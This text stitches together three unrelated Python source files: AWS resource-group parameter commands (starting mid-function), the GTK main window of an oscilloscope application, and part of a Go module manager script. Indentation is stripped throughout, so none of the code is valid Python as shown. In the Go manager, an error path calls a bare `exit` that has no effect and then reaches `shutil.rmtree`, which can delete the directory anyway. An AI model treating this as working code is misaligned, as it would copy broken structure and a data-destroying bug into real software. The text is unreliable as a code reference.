raise HandledError('A project stack must be created before parameters can be listed.')
if args.deployment != '*' and args.deployment not in context.config.deployment_names:
context.view.no_such_deployment_parameter_warning(args.deployment)
if args.resource_group != '*' and args.resource_group not in context.resource_groups:
context.view.no_such_resource_group_parameter_warning(args.resource_group)
project_settings = context.config.project_settings
deployment_settings = project_settings.setdefault('deployment', {}).setdefault(args.deployment, {})
resource_group_settings = deployment_settings.setdefault('resource-group', {}).setdefault(args.resource_group, {})
parameters = resource_group_settings.setdefault('parameter', {})
old_value = parameters.get(args.parameter, None)
parameters[args.parameter] = args.value
context.view.parameter_changed(args.deployment, args.resource_group, args.parameter, args.value, old_value)
context.config.save_project_settings()
def clear_parameter(context, args):
if not context.config.project_initialized:
raise HandledError('A project stack must be created before parameters can be listed.')
project_settings = context.config.project_settings
change_list = []
for deployment_name, deployment_settings in project_settings.get('deployment', {}).iteritems():
if not args.deployment or deployment_name == args.deployment:
for resource_group_name, resource_group_settings in deployment_settings.get('resource-group', {}).iteritems():
if not args.resource_group or resource_group_name == args.resource_group:
parameters = resource_group_settings.get('parameter', {})
if args.parameter in parameters:
change_list.append(
{
'deployment_name': deployment_name,
'resource_group_name': resource_group_name,
'parameter_name': args.parameter,
'parameter_value': parameters[args.parameter]
})
if change_list:
ok = context.view.confirm_parameter_clear(change_list, args.confirm_clear)
if ok:
for change in change_list:
deployment_settings = project_settings.get('deployment', {}).get(change['deployment_name'], None)
if deployment_settings:
resource_group_settings = deployment_settings.get('resource-group', {}).get(change['resource_group_name'], None)
if resource_group_settings:
parameters = resource_group_settings.get('parameter', {})
if change['parameter_name'] in parameters:
del parameters[change['parameter_name']]
context.config.save_project_settings()
else:
context.view.parameter_not_found(args.deployment, args.resource_group, args.parameter)
def list_resource_group_resources(context, args):
deployment_name = args.deployment
resource_group_name = args.resource_group
if deployment_name is None:
deployment_name = context.config.default_deployment
resource_group = context.resource_groups.get(resource_group_name, optional = True)
if resource_group:
if deployment_name:
resource_group_stack_id = resource_group.get_stack_id(deployment_name, optional=True)
else:
resource_group_stack_id = None
pending_resource_status = resource_group.get_pending_resource_status(deployment_name)
else:
# resource group may have been removed but there is still a stack
if deployment_name:
resource_group_stack_id = context.config.get_resource_group_stack_id(deployment_name, resource_group_name, optional=True)
else:
resource_group_stack_id = None
if not resource_group_stack_id:
raise HandledError('The resource group {} does not exist.'.format(resource_group_name))
pending_resource_status = context.stack.get_pending_resource_status(
resource_group_stack_id,
new_template = {} # resource status will be pending DELETE
)
context.view.resource_group_resource_list(
resource_group_stack_id,
deployment_name,
resource_group_name,
pending_resource_status
)
def add_player_access(context, args):
# Add player access to the resource permissions
security.add_permission_to_role(context, args.resource_group, args.resource, 'Player', args.action)
# Add the dependency to access control resource
group = context.resource_groups.get(args.resource_group)
if security.ensure_access_control(group.template, args.resource):
context.config.save_resource_group_template(args.resource_group)
context.view.access_control_dependency_changed(args.resource_group, args.resource)
def create_function_folder(context, args):
group = context.resource_groups.get(args.resource_group)
function_path = os.path.join(group.directory_path, 'lambda-code', args.function)
if not args.force:
function_template_definition = util.dict_get_or_add(group.template, 'Resources', {}).get(args.function, {})
if not function_template_definition:
raise HandledError("Function {} does not exist in Resource group {}. Not adding lambda-code folder".format(args.function, args.resource_group))
if not function_template_definition['Type'] == 'AWS::Lambda::Function':
raise HandledError("{} is not a Lambda Function resource in Resource group {}. Not adding lambda-code folder".format(args.function, args.resource_group))
if not os.path.exists(function_path):
# if function folder does not already exist add it
context.config.copy_default_lambda_code_content(function_path)
|
"""
This file is part of YAOS and is licenced under the MIT licence.
"""
import gettext
gettext.bindtextdomain('yaosapp', '/lang')
gettext.textdomain('yaosapp')
_ = gettext.gettext
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib, Gio, Gdk, GdkPixbuf
import sys, time, random, math
from datetime import datetime
import ScopeController as SC
import UIChannelTab, UIDisplayTab, UITriggerTab, UIChannelWidget, UINotifier, ScopeArena, Utils
LAYOUT_FILE = "resources/mainapp.gtkbuilder"
# Load debug logger
import logging
log = logging.getLogger()
# Possible icon sizes
SIZE_OTHER = 0
SIZE_ICON = 1
# Popup menu options
popdown_menu_options = [
(_("Save Settings"), "_menu_save_settings", "<Ctrl>S"),
(_("Load Settings"), "_menu_load_settings", "<Ctrl>O"),
(_("Quick Save Settings"), "_menu_quick_save_settings", "<Ctrl><Alt>S"),
(_("Quick Load Settings"), "_menu_quick_load_settings", "<Ctrl><Alt>O"),
(_("Defaults"), "_menu_load_defaults"),
None,
(_("Help"), "_menu_help", "F1"),
(_("About & Credits"), "_menu_about"),
(_("Licences"), "_menu_licence"),
None,
(_("Preferences"), "_menu_preferences"),
(_("Shutdown"), "_menu_shutdown"),
(_("Reboot"), "_menu_reboot"),
(_("Exit Application"), "_menu_exit", "<Alt>F4"),
]
# How often to refresh UI data. Lower number = more CPU, faster refresh.
UI_REFRESH_MS = 1000 / 25.0
# Minimum delay between refreshes; as load in a tick increases the delay might reduce to keep the UI
# responsive (& above rate consistent), but we don't want to steal all of GTK's time
UI_MIN_DELAY_MS = 5.0
# How long to wait before syncing a last save state.
STATE_SYNC_WAIT = 10
# UI space usage, estimated to set the waveform render target size
UI_VERTICAL_SPACE = 48
UI_HORIZONTAL_SPACE = 196
def dialog_box(window, pri_text, sec_text, icon, buttons):
"""Helper function to make a dialog box appear and return the result."""
dlg = Gtk.MessageDialog(window, 0, icon, buttons, "")
dlg.set_markup("<b>{0}</b>".format(pri_text))
dlg.format_secondary_text(sec_text)
resp = dlg.run()
dlg.destroy()
return resp
class MainApplication(object):
"""
MainApplication handles the main application UI thread as well as starting the
various service tasks that run the oscilloscope application.
It doesn't handle anything to do with waveform acquisition or rendering. Those
are handled from within WaveApp and the GL application.
"""
status_icon_size = 0
channel_tab_shading_factor = 0.0
ui_tabs = []
ui_widgets = []
active_ch = 0
# Flasher variable; flips state at config FlashFreq rate
flash_period = 0
flash_state = False
flash_timer = 0
flash_error = 0
last_ui_time = None
last_clock_time = 0
ticks = 0
last_window_size = (0, 0)
delay_tick = 0
last_tick = 0
fps_average_accu = 0
fps_average_count = 0
fps_average = 0
# Time that the acquisition automatically starts; used for power-up auto start
start_auto = 0.0
# Last time the state was synced and whether a new state needs to be synced
last_state_sync_time = time.time()
state_sync_pending = True
# Used for UI caching
last_acq_params = None
def __init__(self, cfgmgr):
"""
Init function. This loads the GUI configuration, the application configurator,
and the required skin/theme.
"""
self.cfgmgr = cfgmgr
log.info("Start initialising oscilloscope control")
self.ctrl = SC.ScopeController(self)
# Here we'd display a splash screen while setting everything up...
# Connect the ScopeController to hardware.
self.ctrl.set_render_parameters(int(self.cfgmgr.Render.DisplaySamples), int(self.cfgmgr.Render.DisplayHDivisionsYT))
self.ctrl.connect()
log.info("Done initialising oscilloscope control")
# Load CSS file as specified in config file and apply it to everything
log.info("Start initialising GTK configuration")
self.css = Gtk.CssProvider()
self.css.load_from_file(Gio.File.new_for_path(self.cfgmgr.Theme.CSSFile))
Gtk.StyleContext.add_provider_for_screen(Gdk.Screen.get_default(), self.css, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.resource_icon_size = int(self.cfgmgr.Theme.StatusIconSize)
self.resource_root = str(self.cfgmgr.Theme.ResourceDir)
# Load the GtkBuilder application object and load common objects.
self.builder = Gtk.Builder()
self.builder.add_from_file(LAYOUT_FILE)
self.overlay_main = Gtk.Overlay()
self.vbox_main = self.builder.get_object("vbox_main")
self.hbox_main = self.builder.get_object("hbox_main")
self.overlay_main.add(self.vbox_main)
self.overlay_fixed = Gtk.Fixed()
self.window = Gtk.Window()
self.window.set_size_request(1280, 800)
self.window.add(self.overlay_main)
self.lbl_status_time = self.builder.get_object("lbl_status_time")
self.lbl_status_run = self.builder.get_object("lbl_status_run")
self.lbl_status_run_ctx = self.lbl_status_run.get_style_context()
# Since the contents of these labels can change, set their size to be at least 80 pixels wide each
# TODO: Do we need to make this configurable by the stylesheet/theme?
self.lbl_status_bits_samplerate = self.builder.get_object("lbl_status_bits_samplerate")
self.lbl_status_npoints_nwaves = self.builder.get_object("lbl_status_npoints_nwaves")
self.lbl_status_bits_samplerate.set_size_request(80, -1)
self.lbl_status_npoints_nwaves.set_size_request(80, -1)
# Connect to the timebase labels
self.evt_lbl_status_timebase = self.builder.get_object("evt_lbl_status_timebase")
self.evt_lbl_status_timebase.connect("button-press-event", self._timebase_click)
self.lbl_status_timebase = self.builder.get_object("lbl_status_timebase")
self.ui_update_timebase_labels()
# Create the AccelGroup for all key bindings
self.agr = Gtk.AccelGroup()
self.window.add_accel_group(self.agr)
# Create the notifier controller
self.notifier = UINotifier.NotifyController()
self.overlay_main.add_overlay(self.overlay_fixed)
self.overlay_main.set_overlay_pass_through(self.overlay_fixed, True)
self.notifier.set_fixed_container(self.overlay_fixed)
# Test default images
self.set_svg_image("img_status_trigger_type", "trigger_rising_edge", SIZE_ICON)
self.set_svg_image("img_status_wifi", "wifi_3", SIZE_ICON)
self.set_svg_image("img_status_net", "network_active", SIZE_ICON)
self.set_svg_image("img_status_usb", "blank", SIZE_ICON)
self.set_svg_image("img_status_mute", "blank", SIZE_ICON)
# Set logo
self.ebx_img_logo = self.builder.get_object("ebx_img_logo")
self.ebx_img_logo.connect("button-press-event", self._logo_clicked)
self.img_logo = self.builder.get_object("img_logo")
self.img_logo.set_from_file(self.cfgmgr['UI']['Logo'])
# Apply common CSS classes
self.add_css_class_by_widget_name("lbl_status_run", "runstate_common")
self.add_css_class_by_widget_name("lbl_status_timebase_char", "status_box_left_horiz_common")
self.add_css_class_by_widget_name("lbl_status_delay_char", "status_box_left_horiz_common")
self.add_css_class_by_widget_name("lbl_status_timebase", "status_box_right_horiz_common")
self.add_css_class_by_widget_name("lbl_status_delay", "status_box_right_horiz_common")
self.add_css_class_by_widget_name("lbl_status_trigger_char", "status_box_left_horiz_common")
self.add_css_class_by_widget_name("img_status_trigger_type", "status_box_middle_horiz_common")
self.add_css_class_by_widget_name("grd_status_trigger_channel_container", "status_box_middle_horiz_common")
self.add_css_class_by_widget_name("lbl_status_trigger_info", "status_box_right_horiz_common")
# Set the application title.
self.window.set_title(_("BluePulse Oscilloscope - Main"))
# Connect window signals
self.window.connect("key_press_event", self._wnd_key_press)
self.window.connect("key_release_event", self._wnd_key_release)
self.window.connect("configure-event", self._wnd_config_event)
self.setup_settings_notebook()
self.setup_channel_widgets()
self.setup_context_menu()
self.setup_render_arena()
self.restore_settings_last()
# Done initialisation of GUI stuff
log.info("Done initialising GTK configuration")
# Set the start signal. It will start the acquisition automatically a few seconds after the application launches.
self.start_auto = time.time() + 6.0
def setup_settings_notebook(self):
"""Populate the settings notebook."""
# Load the GtkBuilder resource for the channel tabs in the selection notebook, and
# add one tab for each channel. Add additional tabs for display, acquire, trigger etc.
# XXX: Should we empty the notebook first?
log.info("Creating settings notebook")
self.nbk_main_settings = self.builder.get_object("nbk_main_settings")
self.nbk_main_settings.set_hexpand(False)
self.nbk_main_settings.set_hexpand_set(True)
self.nbk_main_settings.set_size_request(50, 0)
self.nbk_main_settings.connect("select_page", self._nbk_select_page)
# Add channel tabs
for idx, channel in enumerate(self.ctrl.channels):
ui_tab = UIChannelTab.ChannelTab(self, idx, self.nbk_main_settings, len(self.ui_tabs) + 1)
ui_tab.append_to_notebook()
self.ui_tabs.append(ui_tab)
# Add display tab
ui_tab = UIDisplayTab.DisplayTab(self, self.nbk_main_settings, len(self.ui_tabs) + 1)
ui_tab.append_to_notebook()
self.ui_tabs.append(ui_tab)
# Add trigger tab
ui_tab = UITriggerTab.TriggerTab(self, self.nbk_main_settings, len(self.ui_tabs) + 1)
ui_tab.append_to_notebook()
ui_tab.refresh_ui()
self.ui_tabs.append(ui_tab)
# TODO: acquire, math, reference, storage, utility...
def setup_channel_widgets(self):
"""Setup the channel widgets for the UI."""
log.info("Creating channel widgets")
# Add a ChannelWidget for each channel to the channel widget container
self.box_channel_info = self.builder.get_object("box_channel_info")
for idx, channel in enumerate(self.ctrl.channels):
wdg = UIChannelWidget.ChannelWidget(self, idx)
self.box_channel_info.pack_start(wdg.get_embedded_container(), False, True, 0)
self.ui_widgets.append(wdg)
def setup_context_menu(self):
"""Create the dropdown general purpose menu that is triggered by key press or clicking
the application logo."""
self.popdown_menu = Gtk.Menu()
self.popdown_menu.set_accel_group(self.agr)
row = 0
for opt in popdown_menu_options:
if opt is None:
item = Gtk.SeparatorMenuItem()
else:
item = Gtk.MenuItem(opt[0])
if len(opt) == 3:
keyval, mod = Gtk.accelerator_parse(opt[2])
item.add_accelerator("activate", self.agr, keyval, mod, Gtk.AccelFlags.VISIBLE)
item.connect("activate", getattr(self, opt[1]))
self.popdown_menu.attach(item, 0, 1, row, row + 1)
row += 1
def setup_render_arena(self):
log.info("Initialising ScopeArenaController")
self.ctrl.arena.gtk_attach(self.window, self.hbox_main, 'pack_start', (True, True, 0))
def restore_settings_last(self):
"""
Try to load the last settings file.
If this fails load the default setting file and show an error.
If *this* fails, then save a default setting file on the basis of default state
configuration in the various objects.
"""
log.info("Loading last settings file")
try:
self.ctrl.restore_settings_last()
except Exception as e:
try:
log.critical("Exception during setting restore: %r" % e)
log.info("Attempting to use default configuration file")
self.ctrl.restore_settings_default()
self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_WARNING, \
_("Unable to load last configuration - reverting to default configuration")))
except:
log.critical("Exception during default setting restore: %r" % e)
log.error("Unable to load any configuration file. The application may be unstable")
self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_WARNING, \
_("Unable to load last OR default configuration - configuration has errors. The application may be unstable!\n" \
"Please restore the configuration file to the user directory.")))
self.ui_sync_config()
log.info("Done loading last settings file")
def __user_exception_handler(func):
def wrapper(self, *args):
try:
return func(self, *args)
except Utils.UserRequestError as e:
self._user_exception(e)
return True # stop events being duplicated
return wrapper
def _user_exception(self, exc):
"""Called by subclasses if a user exception occurs. Handles the display of the warning message
to the user."""
log.error("UserException: %s" % repr(exc))
self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_WARNING, str(exc)))
def _user_message(self, msg):
"""Called to display a message to the user."""
log.info("UserMessage: %s" % str(msg))
self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_INFO, str(msg)))
def _nbk_select_page(self, *args):
# Store tab in ctrl structure so this can be recalled from saved configurations
self.ctrl.active_tab = self.nbk_main_settings.get_current_tab()
self.state_change_notify()
def _wnd_key_press(self, *args):
log.info("_wnd_key_press %r" % list(args))
def _wnd_key_release(self, *args):
log.info("_wnd_key_release %r" % list(args))
def _wnd_config_event(self, *args):
rect = self.window.get_allocated_size().allocation
w = rect.width - UI_HORIZONTAL_SPACE
h = rect.height - UI_VERTICAL_SPACE
log.info("New window size: %d x %d; after removing mandatory space: %d x %d approx. available for waveform" % \
(rect.width, rect.height, w, h))
self.ctrl.arena.notify_resize()
def _logo_clicked(self, *args):
log.info("_logo_clicked %r" % list(args))
self.popdown_menu.show_all()
self.popdown_menu.popup_at_widget(self.img_logo, Gdk.Gravity.SOUTH_WEST, Gdk.Gravity.NORTH_WEST, None)
def _app_nice_quit(self):
# we'd kill all subprocesses nicely; waiting up to 5 seconds for them to terminate...
# then we'll save our configuration
# then we'll shut down the AFE and other parts cleanly
# then we'll nicely quit
# ... but for now, just sys.exit()
log.info("Application quit")
log.flush()
sys.exit()
def _menu_save_settings(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_load_settings(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_quick_save_settings(self, *args):
log.info("Quick save settings activated")
self.ctrl.save_settings_temp()
self._user_message(_("Present settings saved into quick restore file"))
def _menu_quick_load_settings(self, *args):
log.info("Quick load settings activated")
self.ctrl.restore_settings_temp()
self.ui_sync_config()
self.prompt_user_50ohm()
self.ui_sync_config()
self._user_message(_("Settings restored from quick restore file"))
def _menu_load_defaults(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_help(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_about(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_licence(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_preferences(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_shutdown(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_reboot(self, *args):
self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_exit(self, *args):
# prompt to exit?
self._app_nice_quit()
@__user_exception_handler
def _timebase_click(self, wdg, evt):
# Compute position of click.
xp = evt.x / wdg.get_allocation().width
if xp >= 0 and xp < 0.33:
# Clicks in the first 1/3rd are interpreted as a decreased timebase;
self.ctrl.timebase.timebase_down()
elif xp > 0.4 and xp < 0.6:
# Clicks in between the two are interpreted as selecting the timebase/horizontal options (not implemented)
log.warning("Middle click on timebase: not yet implemented")
elif xp > 0.66 and xp <= 1:
# Clicks in the last 1/3rd are interpreted as an increase timebase;
self.ctrl.timebase.timebase_up()
self.ui_update_timebase_labels()
def state_change_notify(self, opt_ident=""):
"""State change notifier. opt_ident can be passed to identify a change notifier to be
called e.g. 'ch-colour' to notify the render engine that the wave colour has changed."""
# Set a flag. Changes are synced after a few seconds.
self.state_sync_pending = True
def state_change_notify_ext(self, ident):
"""Extended state change notifier. ident can be passed to identify a change notifier to be
called e.g. 'ch-colour' to notify the render engine that the wave colour has changed."""
self.state_change_notify()
if ident == "ch-colour":
self.ctrl.arena.notify_channel_colour_change()
def state_change_all(self):
self.state_change_notify_ext("ch-colour")
def prompt_user_50ohm(self):
"""Check if any channels have 50 ohm mode selected after restoring settings.
If any have 50 ohm enabled then the user is prompted to confirm before continuing,
to prevent accidental hardware damage."""
names = []
for ch in self.ctrl.channels:
if not ch.termination_50R_applied and ch.termination_50R:
names.append(ch.default_long_name)
if len(names) > 0:
names_catenated = ", ".join(names)
message = gettext.ngettext("{0} has 50 ohm mode enabled. ", "Inputs ({0}) have 50 ohm mode enabled. ", len(names)).format(names_catenated) + "\n\n" + \
_("If a terminated channel has a voltage greater than 10 volts applied, instrument damage could occur. \n\n"
"Would you like to enable the termination for these channels?")
res = dialog_box(pri_text=_("Warning - 50 ohm mode enabled for some channels!"),
sec_text=message, icon=Gtk.MessageType.WARNING, buttons=Gtk.ButtonsType.YES_NO,
window=self.window)
if res == Gtk.ResponseType.YES:
for ch in self.ctrl.channels:
if not ch.termination_50R_applied and ch.termination_50R:
ch.termination_50R = True
ch.termination_50R_applied = True
else:
for ch in self.ctrl.channels:
if not ch.termination_50R_applied and ch.termination_50R:
ch.termination_50R = False
ch.termination_50R_applied = False
def channel_widget_click(self, channel):
# Find the appropriate ChannelTab instance and send the click message
for tab in self.ui_tabs:
if isinstance(tab, UIChannelTab.ChannelTab):
if tab.channel == channel:
tab.tab_clicked(None)
def add_css_class_by_widget_name(self, widget, cls):
self.builder.get_object(widget).get_style_context().add_class(cls)
def set_svg_image(self, widget, file, size_class):
if size_class == SIZE_ICON:
size = self.resource_icon_size
else:
raise ValueError(_("size parameter invalid"))
Utils.set_svg_image(self.builder.get_object(widget), self.resource_root + file + ".svg", size)
def ui_tick(self, *args, **kwargs):
"""
This is run several times per second. It despatches the update tasks (updating measurements,
the time, wifi/network status, etc.)
"""
tick_start = time.time()
# Update the flash state
if self.last_ui_time == None:
self.last_ui_time = time.time()
self.flash_timer += time.time() - self.last_ui_time
if self.flash_timer >= self.flash_period:
self.flash_error = self.flash_timer - self.flash_period
self.flash_timer = self.flash_error
self.flash_state = not self.flash_state
# Run helper functions
#t0 = time.time()
self.ui_update_clock()
#self.ui_update_run_state()
self.ui_update_acq_parameters()
self.ui_update_tabs()
self.ui_update_widgets()
#t1 = time.time()
#log.debug("widget_update: %.1f ms" % ((t1 - t0) * 1000))
#t0 = time.time()
self.notifier.update_overlay(self.window.get_size()[0])
#t1 = time.time()
#log.debug("update_overlay: %.1f ms" % ((t1 - t0) * 1000))
self.last_ui_time = time.time()
self.ticks += 1
# Check if a sync is pending. The state is synced every 10 seconds.
# (But only if the state changes.)
if self.state_sync_pending:
tdelta = time.time() - self.last_state_sync_time
if tdelta < 0 or tdelta > STATE_SYNC_WAIT:
log.info("Syncing last oscilloscope state to disk")
self.ctrl.save_settings_last()
self.last_state_sync_time = time.time()
self.state_sync_pending = False
# Sync scope controller functions
self.ui_tick_scope()
# Stop this iteration and set a new iteration up with the correct delay to maintain
# the desired tick rate
if self.last_tick is None:
self.delay_tick = UI_REFRESH_MS
else:
actual_delay = (tick_start - self.last_tick) * 1000
self.delay_tick -= (actual_delay - UI_REFRESH_MS)
self.delay_tick = max(self.delay_tick, UI_MIN_DELAY_MS)
# performance benchmarking: average performance over last 200 frames, once every 8 frames
self.fps_average_accu += 1000.0 / actual_delay
self.fps_average_count += 1
if self.fps_average_count > 200:
self.fps_average_count = 0
self.fps_average_accu = 0
elif (self.fps_average_count & 7) == 0:
self.fps_average = self.fps_average_accu / self.fps_average_count
log.debug("set_tick: %7.3f ms, actual_delay: %3.3f ms, avg_frame_rate: %2.1f fps" % (self.delay_tick, actual_delay, self.fps_average))
# does this cause stack overflow?
GLib.timeout_add(self.delay_tick, self.ui_tick, None, priority=GLib.PRIORITY_DEFAULT)
self.last_tick = tick_start
return False
def ui_tick_scope(self):
#t0 = time.time()
try:
self.ctrl.tick()
except Utils.UserRequestError as e:
log.critical("UserException passed from tick controller: %r" % e)
self._user_exception(e)
#t1 = time.time()
#log.info("ctrl_tick %.1f ms" % ((t1 - t0) * 1000))
# Should we start acquisition automatically?
if self.start_auto != None and time.time() > self.start_auto:
log.info("Automatically starting acquisition on power up...")
self.start_auto = None
self.ctrl.acq_run()
# Update controller
t0 = time.time()
self.ctrl.update()
t1 = time.time()
#log.info("update() %.1f ms" % ((t1 - t0) * 1000))
def ui_update_clock(self):
"""
Update the date and time on the user interface.
"""
# Only update if more than 1 second has elapsed...
if (time.time() - self.last_clock_time) > 1.0:
# Not all OSes support %n in strftime, so split and generate timestrings for each
time_strs = []
time_format = str(self.cfgmgr.UI.TimeFormat).split('%n')
for line in time_format:
time_strs.append(datetime.now().strftime(line.strip()))
time_outstr = "\n".join(time_strs)
self.lbl_status_time.set_markup(time_outstr)
self.last_clock_time = time.time()
def ui_update_acq_parameters(self):
"""
Update acquisition parameters: memory depth, waves/sec, bit depth, etc.
"""
# TODO: Only update these on change...
#waveforms_per_second = round(self.ctrl.get_waves_per_second(), 2)
waveforms_per_second = round(self.ctrl.get_current_average_waves_per_second(), 3)
#log.info("wfms:%.3f" % self.ctrl.get_current_average_waves_per_second())
memory_depth = self.ctrl.get_memory_depth()
sample_rate = self.ctrl.get_sample_rate()
bits = self.ctrl.get_sample_depth()
_acq_params = (waveforms_per_second, memory_depth, sample_rate, bits)
#log.info("acq_params: %r" % (_acq_params,))
if _acq_params != self.last_acq_params:
# TRANSLATORS: lbl_status_bits_samplerate contains a bit depth (8-bit; compare 'audio' and 'graphics' bit depths, for instance)
# and a sample rate (samples per second, compare with frequency or repetitiveness.) This label probably should not be translated,
# or altered. Only translate the units if they are not commonly understood in engineering fields in your locale.
self.lbl_status_bits_samplerate.set_markup(\
_("{bits_value}-bit\n{samplerate_string}").format(
bits_value=bits, \
samplerate_string=Utils.unit_format_suffix_handle_exc(sample_rate, _("Sa/s"), precision=2) \
))
# TRANSLATORS: lbl_status_npoints_nwaves contains the number of points per waveform and the number of waveforms per second
# that the instrument is acquiring (or is targeting for acquisition.) The base label is not translatable.
#
# pts = points, wfm/s = waveforms per second; only translate the units if they are not commonly understood in engineering
# fields in your locale.
#stats = self.ctrl.get_zs_stats()
#log.info("%s" % repr(stats))
self.lbl_status_npoints_nwaves.set_markup(\
"{points_string}\n{nwaves_string}".format(\
points_string=Utils.unit_format_suffix_handle_exc(memory_depth, _("pts"), precision=1), \
nwaves_string=Utils.unit_format_suffix_handle_exc(waveforms_per_second, _("wfm/s"), precision=2) \
))
self.last_acq_params = _acq_params
def ui_update_run_state(self):
"""
Update the run state based on the ScopeController state.
"""
self.lbl_status_run_ctx.remove_class("runstate_stop")
self.lbl_status_run_ctx.remove_class("runstate_run")
self.lbl_status_run_ctx.remove_class("runstate_trigd")
self.lbl_status_run_ctx.remove_class("runstate_wait_dim")
self.lbl_status_run_ctx.remove_class("runstate_wait_bri")
self.lbl_status_run_ctx.remove_class("runstate_auto_dim")
self.lbl_status_run_ctx.remove_class("runstate_auto_bri")
if self.ctrl.run_state == SC.STATE_RUNNING_WAIT_TRIG:
if self.flash_state:
self.lbl_status_run_ctx.add_class("runstate_wait_bri")
self.lbl_status_run.set_markup(_("WAIT"))
else:
self.lbl_status_run_ctx.add_class("runstate_wait_dim")
self.lbl_status_run.set_markup(_("WAIT"))
elif self.ctrl.run_state == SC.STATE_RUNNING_AUTO:
if self.flash_state:
self.lbl_status_run_ctx.add_class("runstate_auto_bri")
self.lbl_status_run.set_markup(_("AUTO"))
else:
self.lbl_status_run_ctx.add_class("runstate_auto_dim")
self.lbl_status_run.set_markup(_("AUTO"))
elif self.ctrl.run_state == SC.STATE_STOPPED:
self.lbl_status_run_ctx.add_class("runstate_stop")
self.lbl_status_run.set_markup(_("STOP"))
elif self.ctrl.run_state == SC.STATE_RUNNING_TRIGD:
self.lbl_status_run_ctx.add_class("runstate_trigd")
self.lbl_status_run.set_markup(_("TRIG'D"))
def ui_update_timebase_labels(self):
self.lbl_status_timebase.set_markup(Utils.unit_format_atten(self.ctrl.timebase.get_timebase().get_div_value(), "s"))
def ui_update_tabs(self):
for tab in self.ui_tabs:
tab.refresh_tab()
def ui_update_widgets(self):
# Only update these on every 10th frame, until we fix the resource hog bug
if self.ticks % 10 == 0:
for wdg in self.ui_widgets:
wdg.refresh_widget()
def ui_sync_config(self):
for tab in self.ui_tabs:
tab.refresh_object_attach()
for wdg in self.ui_widgets:
wdg.refresh_object_attach()
# Read the flash rate and calculate the flash period.
try:
self.flash_period = 1.0 / float(self.cfgmgr.UI.FlashFreq)
except:
self.flash_period = 0.4 # Default
log.info("Active tab index: %d" % self.ctrl.active_tab)
self.nbk_main_settings.set_current_page(self.ctrl.active_tab)
def run(self):
"""
Start the MainApplication. This launches all required threads and shows the user interface.
"""
self.window.show_all()
self.last_tick = None
self.delay_tick = UI_REFRESH_MS
GLib.timeout_add(UI_REFRESH_MS, self.ui_tick, None, priority=GLib.PRIORITY_DEFAULT)
Gtk.main()
|
#
# Copyright (C) 2021 Sellers Industry
# distributed under the MIT License
#
# author: <NAME> <<EMAIL>>
# date: Wed Jan 06 2021
# file: __main__.py
# project: Bubble Gom (Go Manager)
# purpose: Go manager allows you to build go modules from anywhere
#
#
import argparse
import os
import json
from datetime import datetime
import shutil
import glob
# Config
VERSION = "0.0.1"
GO_PATH = "/Go/src"
LOCKFILE_NAME = "gom-lock"
CONFIG_NAME = "gom.config"
"""
Build Lock File Data
Will create the lockfile data. The lock file will have the gom version
number, the source directory it is built from, the date it will built on,
and the first creation time.
sourceDirectory - the source it's being built from
firstBuild - string from the past lockfile or False
"""
def buildLockFile( sourceDirectory, firstBuild ):
lockFileData = {}
lockFileData[ "source" ] = sourceDirectory
lockFileData[ "gomV" ] = VERSION
lockFileData[ "build" ] = str( datetime.now() )
if firstBuild: # if has first build
lockFileData[ "created" ] = firstBuild
else:
lockFileData[ "created" ] = lockFileData[ "build" ]
return lockFileData # return json dict data
"""
Add Lock File
Will add lock file to the vendor directory.
vendorDirectory - directory to build lockfile in
lockFileData - data created from buildLockFile()
"""
def addLockFile( vendorDirectory, lockFileData ):
if os.path.isdir( vendorDirectory ): # valid vendor directory
filename = os.path.join( vendorDirectory, LOCKFILE_NAME ) # filename for dump
with open( filename, 'w') as outfile: # open file
json.dump( lockFileData, outfile ) # dump data
"""
Get Lock File
Will get the lock file from the vendor directory or return false if there
is no vendor directory. The data will be parsed into a python dict.
vendorDirectory - directory to get lockfile from
"""
def getLockFile( vendorDirectory ):
filename = os.path.join( vendorDirectory, LOCKFILE_NAME ) # file name if exists
if os.path.isfile( filename ): # does file exists
with open( filename ) as lockFile: # open file
return json.load( lockFile ) # return json parsed data
return False # if file does not exist
"""
Add Config Data
Adds config data to the vendor file. This is just so their is a backup of
the gom config.
vendorDirectory - build directory to prepare
config - data from the gom.config as dict
"""
def addConfig( vendorDirectory, config ):
if os.path.isdir( vendorDirectory ): # valid vendor directory
filename = os.path.join( vendorDirectory, CONFIG_NAME ) # filename for dump
with open( filename, 'w') as outfile: # open file
json.dump( config, outfile ) # dump data
"""
Prepare Vendor Directory
Will prepare the vendor directory. If the directory does not exist will
create it. If the directory does will empty it if it contains a lock from
the same build source. If there is content in the direcotry but no lock file
then it will fail.
vendorDirectory - build directory to prepare
sourceDirectory - where is it being build from
config - data from the gom.config as dict
"""
def prepareVenderDirectory( vendorDirectory, sourceDirectory, config ):
lockFileData = None
if os.path.isdir( vendorDirectory ):
# Valid Path
lockFile = getLockFile( vendorDirectory )
if not os.listdir( vendorDirectory ):
lockFileData = buildLockFile( sourceDirectory, False )
addLockFile( vendorDirectory, buildLockFile( sourceDirectory, False ) )
elif lockFile and lockFile[ "source" ] == sourceDirectory:
lockFileData = buildLockFile( sourceDirectory, lockFile[ "created" ] )
else:
print( """Error: Unable to get gom-lock for vendor.\nThe
directory you are trying to build in does not appear
to be the same gom project.\n{}"""
.format( vendorDirectory ) )
exit
shutil.rmtree( vendorDirectory )
else:
lockFileData = buildLockFile( sourceDirectory, False )
os.mkdir( vendorDirectory )
addLockFile( vendorDirectory, lockFileData )
